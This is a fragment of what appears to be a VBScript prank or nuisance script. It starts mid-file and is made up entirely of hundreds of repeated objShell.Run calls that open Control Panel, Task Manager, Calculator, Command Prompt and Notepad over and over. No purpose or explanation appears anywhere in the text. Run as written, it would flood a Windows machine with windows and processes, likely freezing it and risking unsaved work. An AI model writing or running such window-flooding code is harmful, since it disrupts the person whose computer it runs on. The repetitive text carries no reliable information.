
objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

